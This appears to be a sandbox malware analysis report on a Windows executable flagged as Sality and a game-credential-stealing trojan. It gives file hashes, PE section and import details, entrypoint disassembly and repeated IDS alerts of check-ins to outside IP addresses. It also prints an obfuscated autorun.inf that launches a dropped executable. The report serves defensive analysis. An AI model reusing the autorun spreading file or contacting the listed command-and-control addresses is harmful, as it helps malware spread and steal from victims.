                                                                                                                                                                                                                                  Size (bytes):331
                                                                                                                                                                                                                                  Entropy (8bit):5.5040608057125295
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:2Tv2mlA/+9poldltgHP1Lwj1HXGFoCM69oa4GYVVEu2WoNFf8cDRAC3Rnw3WoGkc:23AW9poH3GP1LwQFxoD6u1oNFf82p36+
                                                                                                                                                                                                                                  MD5:37A015B73BDC46535BB45BBDAD0D4EBB
                                                                                                                                                                                                                                  SHA1:9FB06F046C9A31998ED18076867216E6ABEE0996
                                                                                                                                                                                                                                  SHA-256:BAB1E83DA3F6691A58018CE64C99AA5B9DC5CB9DB91E2D62D59A26B6B0D0D198
                                                                                                                                                                                                                                  SHA-512:18FAE953438B5AD9D1ED4CDBE30105009A3A03287F05DDB8EC0485466A86DC9A058806C5EFA841C8FFE6E2AD427844EF246819B6177AAC5269510D25572025A9
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:[AutoRun]....;HygevqrWejp ..;IjCTFe ..OPen=taqcpb.exe....;gekqcrgxkjqixHY JvnhDKTCum ckwaijKErXjEtwU LmqoKpgA pOCuSItli yomgk ..sHEll\open\DefaulT=1....;QOiqYrpWtITlgFStx..SHEll\ExplorE\coMMAnD =taqcpb.exe..;wUFW brauTGnUkHyveL KsnCpnDjmgdBqFn gVlgu RImfBx ..SHell\oPen\comManD=taqcpb.exe..;..ShelL\AUtoplay\cOMmand=taqcpb.exe..

                                                                                                                                                                                                                                  C:\taqcpb.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):99328
                                                                                                                                                                                                                                  Entropy (8bit):7.852859120977788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:/QlrCwcW/CymPEbcJwN0sDfv7+unohVOJbBmUck:/QFKomPEbcGWsH+7Yrck
                                                                                                                                                                                                                                  MD5:46D5AF1958B65C44A1E08007A4058B82
                                                                                                                                                                                                                                  SHA1:933A7627848DD48C88A1704065587C7F3A1A7BA0
                                                                                                                                                                                                                                  SHA-256:DA37A2F2EE259C34404C0B92A58DE7822952F238E96EE89BD1E4A2AD46C29190
                                                                                                                                                                                                                                  SHA-512:F57C557E08E15602A8DD01CC51A533EC28B06BD4FD9EA7B847EFD9250DCC74A5AD9F51DB6E1D7A99A9752CA6B79F54CB4FE7BBCA0152E00DE2C12DED15D1C539
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text............................... ................................................................[.n..~..f...R.E.....E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Entropy (8bit):7.934883635599941
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                  File name:PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File size:2'969'674 bytes
                                                                                                                                                                                                                                  MD5:31bbb64aa3c1753cd99c865869b58023
                                                                                                                                                                                                                                  SHA1:339ecde6fcc4833268f84d0dd5bcb11606ea5e94
                                                                                                                                                                                                                                  SHA256:1a089c8808acf7d3a83c0524e07bd0bb888ab3c987d109bae0613e456c08f32f
                                                                                                                                                                                                                                  SHA512:fc170e42c5017927e44ba2766a6e9073700ce44cf6ea0380c2db260bdc264ea301c2334301a9a796d503760897d915ebdeb31de1d1c9015f0127b952c544bf43
                                                                                                                                                                                                                                  SSDEEP:49152:w4cAGktbxe0UsqKjT4tOGLuyXKpp9vmwneeiL+apGylxetIgUmJF7X:u6tbxhZ3YJ6pp9vmwneeE7pGy6emJ1X
                                                                                                                                                                                                                                  TLSH:17D53344DA470F82EB445B7A82B572C21EE784C986B05FADD4B3951C89BE6031DFB1CB
                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...Y...Y...Y...E...Y..TE...Y...F...Y...F...Y...Y...Y..TQ...Y...z...Y..._...Y..Rich.Y..................PE..L.....!J...........

                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Entrypoint:0x864058
                                                                                                                                                                                                                                  Entrypoint Section:.boot
                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                                                                  Time Stamp:0x4A2182FD [Sat May 30 19:03:25 2009 UTC]
                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                  Import Hash:32c5605c17ed8c33b7bc669a699350af

                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                  inc ebp
                                                                                                                                                                                                                                  not edx
                                                                                                                                                                                                                                  neg ebx
                                                                                                                                                                                                                                  sub edi, 00007FA7h
                                                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                                                  sub edi, 000018D1h
                                                                                                                                                                                                                                  cmp edi, ecx
                                                                                                                                                                                                                                  js 00007FC16C7D7E67h
                                                                                                                                                                                                                                  inc ebx
                                                                                                                                                                                                                                  imul edi, eax
                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                  inc al
                                                                                                                                                                                                                                  mov edi, eax
                                                                                                                                                                                                                                  test bh, bl
                                                                                                                                                                                                                                  cmp ecx, 0000930Ch
                                                                                                                                                                                                                                  jne 00007FC16C7D7E63h
                                                                                                                                                                                                                                  dec ebx
                                                                                                                                                                                                                                  bswap ebp
                                                                                                                                                                                                                                  push 00067849h
                                                                                                                                                                                                                                  xchg al, bl
                                                                                                                                                                                                                                  pop eax
                                                                                                                                                                                                                                  xor dl, 0000002Fh
                                                                                                                                                                                                                                  xor eax, 000000F7h
                                                                                                                                                                                                                                  jbe 00007FC16C7D7E64h
                                                                                                                                                                                                                                  inc dh
                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                  jne 00007FC16C7D7E67h
                                                                                                                                                                                                                                  movzx edx, ah
                                                                                                                                                                                                                                  adc dh, dh
                                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                                  test dl, ah
                                                                                                                                                                                                                                  sub edi, 0006619Eh
                                                                                                                                                                                                                                  jo 00007FC16C7D7E68h
                                                                                                                                                                                                                                  sbb esi, 2AD4ACB8h
                                                                                                                                                                                                                                  not esi
                                                                                                                                                                                                                                  imul eax, ecx, 9633A69Dh
                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                  mov ebx, edx
                                                                                                                                                                                                                                  mov ebp, 19D488F0h
                                                                                                                                                                                                                                  sub ecx, 00000F3Ch
                                                                                                                                                                                                                                  jbe 00007FC16C7D7E64h
                                                                                                                                                                                                                                  test edi, edx
                                                                                                                                                                                                                                  and eax, D4318ABFh
                                                                                                                                                                                                                                  lea edi, dword ptr [0E488C85h]
                                                                                                                                                                                                                                  imul ebx, edi
                                                                                                                                                                                                                                  push FFF1181Ch
                                                                                                                                                                                                                                  and ebx, edi
                                                                                                                                                                                                                                  pop eax
                                                                                                                                                                                                                                  mov ebp, 26EC9258h
                                                                                                                                                                                                                                  add eax, 0000347Bh
                                                                                                                                                                                                                                  cmp bl, ah
                                                                                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                                                                                  xor edx, ebp
                                                                                                                                                                                                                                  sub ecx, 000EB36Ah
                                                                                                                                                                                                                                  test cl, cl
                                                                                                                                                                                                                                  sub eax, EE2B72BFh
                                                                                                                                                                                                                                  not bh
                                                                                                                                                                                                                                  cmp ecx, 00000293h
                                                                                                                                                                                                                                  jnc 00007FC16C7D7E20h
                                                                                                                                                                                                                                  mov bl, 0000002Ah
                                                                                                                                                                                                                                  push edx
                                                                                                                                                                                                                                  test bl, FFFFFF94h
                                                                                                                                                                                                                                  call 00007FC16C7D7E71h
                                                                                                                                                                                                                                  imul esi, edx
                                                                                                                                                                                                                                  or ah, 00000004h
                                                                                                                                                                                                                                  cmp ecx, 00000000h

                                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1606a0xa4.idata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x7c4.rsrc
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                  0x10000xa9660xa00093c2765494cdb57e37d20ee5e6dfa2c2False0.937841796875data7.775257437192022IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0xc0000xfe60x1000acc4cc0c66765c699f6d99fb5fed9095False0.22998046875BS image, Version 22585, Quantization -3425, (Decompresses to -28229 words)2.338376164963073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0xd0000x705c0x200080f4797e10eaf24161df264a75b87dc2False0.5545654296875data5.309127524944744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  0x150000x7c80x10005c952e60d7ddeb6332135be5a70ab42aFalse0.21533203125data2.2384273092863376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .idata0x160000x10000x1000c742d873ff98b7336e5a2c9ad6278917False0.040771484375data0.36307082483983155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .rsrc0x170000x10000x1000cebf04513f50f39b683e511a0c303116False0.197265625data1.9576722479537187IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .themida0x180000x44c0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                  .boot0x4640000x2c40000x2c400039a1e3f4d99c852b78a3f7706e53d49eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                  RT_VERSION0x170580x768dataEnglishUnited States0.40189873417721517

                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                  kernel32.dllGetModuleHandleA
                                                                                                                                                                                                                                  MSVCRT.dll_iob
                                                                                                                                                                                                                                  ADVAPI32.dllFreeSid
                                                                                                                                                                                                                                  WSOCK32.dllgetsockopt
                                                                                                                                                                                                                                  WS2_32.dllWSARecv

                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                  2024-10-18T09:38:17.050151+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749731185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:17.050151+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749731185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:21.240690+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749737190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:21.240690+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.749737190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:21.240690+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749737190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:22.591417+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749758185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:22.591417+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749758185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:26.713691+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749764190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:26.713691+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.749764190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:26.713691+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749764190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:28.058130+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749783185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:28.058130+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749783185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:32.076146+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749790190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:32.076146+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.749790190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:32.076146+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749790190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:33.454309+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749813185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:33.454309+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749813185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:37.482585+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749824190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:37.482585+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.749824190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:37.482585+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749824190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:38.799893+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749845185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:38.799893+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749845185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:42.849777+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749851190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:42.849777+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.749851190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:42.849777+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749851190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:44.218274+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749881185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:44.218274+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749881185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:48.414602+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749888190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:48.414602+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.749888190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:48.414602+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749888190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:49.758906+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749913185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:49.758906+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749913185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:53.779104+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749922190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:53.779104+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.749922190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:53.779104+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749922190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:55.191539+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749943185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:55.191539+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.749943185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:59.200915+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762459190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:59.200915+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762459190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:38:59.200915+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762459190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:00.500105+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762487185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:00.500105+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762487185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:04.530611+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762493190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:04.530611+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762493190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:04.530611+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762493190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:06.749431+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762510185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:06.749431+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762510185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:10.778945+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762512190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:10.778945+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762512190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:10.778945+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762512190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:12.134928+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762513185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:12.134928+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762513185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:16.194613+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762514190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:16.194613+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762514190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:16.194613+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762514190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:17.525520+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762516185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:17.525520+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762516185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:21.577260+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762517190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:21.577260+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762517190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:21.577260+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762517190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:22.899604+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762518185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:22.899604+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762518185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:26.962883+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762519190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:26.962883+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762519190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:26.962883+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762519190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:28.305192+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762521185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:28.305192+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762521185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:32.388529+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762522190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:32.388529+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762522190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:32.388529+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762522190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:33.728702+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762524185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:33.728702+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762524185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:37.753556+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762525190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:37.753556+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762525190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:37.753556+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762525190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:39.248321+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762526185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:39.248321+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762526185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:42.049055+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762527190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:42.049055+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762527190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:42.049055+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762527190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:45.318935+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762528185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:45.318935+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762528185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:53.953751+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762529190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:53.953751+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762529190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:53.953751+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762529190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:55.330024+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762530185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:39:55.330024+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762530185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:03.871177+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762531190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:03.871177+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762531190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:03.871177+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762531190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:05.184315+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762532185.53.178.5080TCP
